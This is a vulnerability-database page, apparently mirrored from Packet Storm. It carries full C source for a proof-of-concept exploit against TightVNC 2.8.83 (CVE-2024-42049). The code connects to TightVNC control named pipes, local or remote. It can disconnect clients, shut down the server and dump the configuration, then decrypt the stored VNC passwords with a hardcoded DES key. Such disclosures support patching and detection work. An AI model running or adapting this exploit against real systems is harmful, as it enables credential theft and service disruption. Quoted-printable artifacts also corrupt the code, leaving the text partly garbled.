Vulners
Lucene search
๐ TightVNC 2.8.83 Control Pipe Manipulation
๐๏ธย 09 Jun 2025ย 00:00:00Reported byย Ionut ZevedeiTypeย 
ย packetstorm๐ย packetstorm.news๐ย 88ย Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Exploit for CVE-2024-42049 | 5 Jun 202519:29 | โ | githubexploit |
 | CVE-2024-42049 | 28 Jul 202405:10 | โ | circl |
 | TightVNC ๅฎๅ จๆผๆด | 28 Jul 202400:00 | โ | cnnvd |
 | CVE-2024-42049 | 28 Jul 202400:00 | โ | cve |
 | CVE-2024-42049 | 28 Jul 202400:00 | โ | cvelist |
 | TightVNC 2.8.83 - Control Pipe Manipulation | 9 Jun 202500:00 | โ | exploitdb |
 | CVE-2024-42049 | 28 Jul 202402:15 | โ | nvd |
 | TightVNC Information Disclosure Vulnerability (Aug 2024) - Windows | 22 Aug 202400:00 | โ | openvas |
 | PT-2024-5229 ยท Tightvnc ยท Tightvnc | 27 Jul 202400:00 | โ | ptsecurity |
 | CVE-2024-42049 | 23 May 202507:43 | โ | redhatcve |
10
# Exploit Title: TightVNC 2.8.83 - Control Pipe Manipulation
# Date: 06/09/2025
# Exploit Author: Ionut Zevedei ([email protected])
# Exploit Repository: https://github.com/zeved/CVE-2024-42049-PoC
# Vendor Homepage: https://www.tightvnc.com/
# Software Link: https://www.tightvnc.com/download.php
# Version: 2.8.83
# Tested on: Windows 10 x64 - TightVNC 2.5.10, 2.8.81
# CVE : CVE-2024-42049
#include <windows.h>=20
#include <stdio.h>
#include <conio.h>
#include <tchar.h>
#include "descrypt.h"
#define GETBYTE(x, n) (((x) >> ((n) * 8)) & 0xFF)
#define BUFFER_SIZE 512
#define TVNC_CMD_DISCONNECT_ALL_CLIENTS 0x06
#define TVNC_CMD_GET_CLIENT_LIST 0x04
#define TVNC_CMD_SHUTDOWN_SERVER 0x07
#define TVNC_CMD_GET_SERVER_INFO 0x11
#define TVNC_CMD_GET_CONFIG 0x12
const unsigned int commands[6] =3D {
TVNC_CMD_DISCONNECT_ALL_CLIENTS,
TVNC_CMD_GET_CLIENT_LIST,
TVNC_CMD_SHUTDOWN_SERVER,
TVNC_CMD_GET_SERVER_INFO,
TVNC_CMD_GET_CONFIG,
};
unsigned char des_key[8] =3D { 23, 82, 107, 6, 35, 78, 88, 7 };
void get_bytes(unsigned int data, unsigned char* out) {
out[0] =3D GETBYTE(data, 3);
out[1] =3D GETBYTE(data, 2);
out[2] =3D GETBYTE(data, 1);
out[3] =3D GETBYTE(data, 0);
}
// printf is wonky when printing passwords later
void print_passwd(unsigned char* passwd) {
for (int i =3D 0; i < 8; i++) {
printf("%c", passwd[i]);
}
printf("\n");
}
void print_error(unsigned long error_code) {
unsigned char* buffer;
=20
// damn it windows...
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
error_code,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &buffer,
0, NULL);
printf("[error]: %s\n", buffer);
}
void decrypt_passwords(unsigned char *buffer_ptr, unsigned int offset) {
unsigned char primary_passwd[8] =3D { 0x00 };
unsigned char view_only_passwd[8] =3D { 0x00 };
printf("\n\tencrypted primary password: ");
for (int i =3D 0; i < 8; i++) {
primary_passwd[i] =3D buffer_ptr[offset + 8 + i];
printf("%02x ", primary_passwd[i]);
}
printf("\n\tencrypted view-only password: ");
for (int i =3D 0; i < 8; i++) {
view_only_passwd[i] =3D buffer_ptr[offset + i];
printf("%02x ", view_only_passwd[i]);
}
unsigned char primary_passwd_decrypted[8] =3D { 0x00 };
unsigned char view_only_passwd_decrypted[8] =3D { 0x00 };
decrypt(primary_passwd_decrypted, view_only_passwd,
sizeof(primary_passwd_decrypted), des_key);
decrypt(view_only_passwd_decrypted, primary_passwd,
sizeof(view_only_passwd_decrypted), des_key);
printf("\n\tdecrypted primary password: ");
print_passwd(primary_passwd_decrypted);
printf("\tdecrypted view-only password: ");
print_passwd(view_only_passwd_decrypted);
}
BOOL open_pipe(PHANDLE handle_ptr, char *pipe_name) {
unsigned long pipe_mode;
BOOL result =3D FALSE;
printf("[~] opening pipe %s...\n", pipe_name);
while (1) {
*handle_ptr =3D CreateFile(
pipe_name,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_FLAG_OVERLAPPED,
NULL
);
if (*handle_ptr !=3D INVALID_HANDLE_VALUE) {
printf("[+] pipe opened\n");
break;
}
if (GetLastError() !=3D ERROR_PIPE_BUSY) {
printf("[-] could not open pipe\n");
print_error(GetLastError());
return FALSE;
}
printf("[~] waiting for named pipe to be available - if this hangs the =
pipe server might be dead.\n");
WaitNamedPipe(pipe_name, NMPWAIT_WAIT_FOREVER);
}
pipe_mode =3D PIPE_READMODE_BYTE;
result =3D SetNamedPipeHandleState(*handle_ptr, &pipe_mode, NULL, NULL);
if (!result) {
printf("[-] failed setting pipe read mode\n");
print_error(GetLastError());
return result;
}
return result;
}
int main(int argc, char* argv[]) {
HANDLE pipe_handle =3D NULL;
unsigned char message[8] =3D { 0x00 };
unsigned char buffer[BUFFER_SIZE] =3D { 0x00 };
BOOL result =3D FALSE;
unsigned long bytes_read, bytes_written;
unsigned int cmd_index =3D 0;
unsigned int offset =3D 30;
if (argc < 3) {
printf("usage: %s <command> <pipe> <offset?>\n", argv[0]);
printf("offset - optional: default is 30 - change as needed\n");
printf("commands:\n");
printf("\t1 - disconnect all clients\n");
printf("\t2 - get client list\n");
printf("\t3 - shutdown server\n");
printf("\t4 - get server info\n");
printf("\t5 - get server config\n");
printf("example pipes:\n\t\\\\192.168.1.42\\pipe\\TightVNC_Service_Cont=
rol\n");
printf("\t\\\\.\\pipe\\TightVNC_Application_Control_On_Session1\n\n");
return 0;
}
char* stop =3D NULL;
cmd_index =3D strtol(argv[1], &stop, 10);
if (stop =3D=3D '\0') {
return 0;
}
cmd_index--;
if (argc =3D=3D 4) {
stop =3D NULL;
offset =3D strtol(argv[3], &stop, 10);
if (offset =3D=3D 0 || stop =3D=3D '\0') {
return 0;
}
}
if (!open_pipe(&pipe_handle, argv[2])) {
goto exit;
}
printf("[i] sending command...\n");
=20
get_bytes(commands[cmd_index], message);
result =3D WriteFile(pipe_handle, message, 8, &bytes_written, NULL);
if (!result) {
printf("[-] failed writing to pipe\n");
print_error(GetLastError());
goto exit;
}
printf("[~] message sent; waiting for reply\n");
do {
result =3D ReadFile(
pipe_handle,
buffer,
BUFFER_SIZE * sizeof(unsigned char),
&bytes_read,
NULL
);
if (!result && GetLastError() !=3D ERROR_MORE_DATA)
break;
printf("[+] got %d bytes back!\n", bytes_read);
printf(" hex: \n\t");
for (int i =3D 0; i < bytes_read; i++) {
printf("%02x ", buffer[i]);
}
printf("\n char: \n\t");
for (int i =3D 0; i < bytes_read; i++) {
printf("%c", buffer[i]);
}
printf("\n\n");
if (cmd_index =3D=3D 4) {
printf("\n[~] command is get config, attempting to decrypt passwords =
using offset %d...\n", offset);
decrypt_passwords(&buffer, offset);
}
memset(buffer, 0, BUFFER_SIZE);
} while (!result);
if (!result)
{
printf("[-] failed reading from pipe\n");
print_error(GetLastError());
goto exit;
}
printf("\n[+] done\n\n");
exit:
if (pipe_handle !=3D NULL) {
CloseHandle(&pipe_handle);
}
return 0;
}Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Jun 2025 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.1
EPSS0.05755
SSVC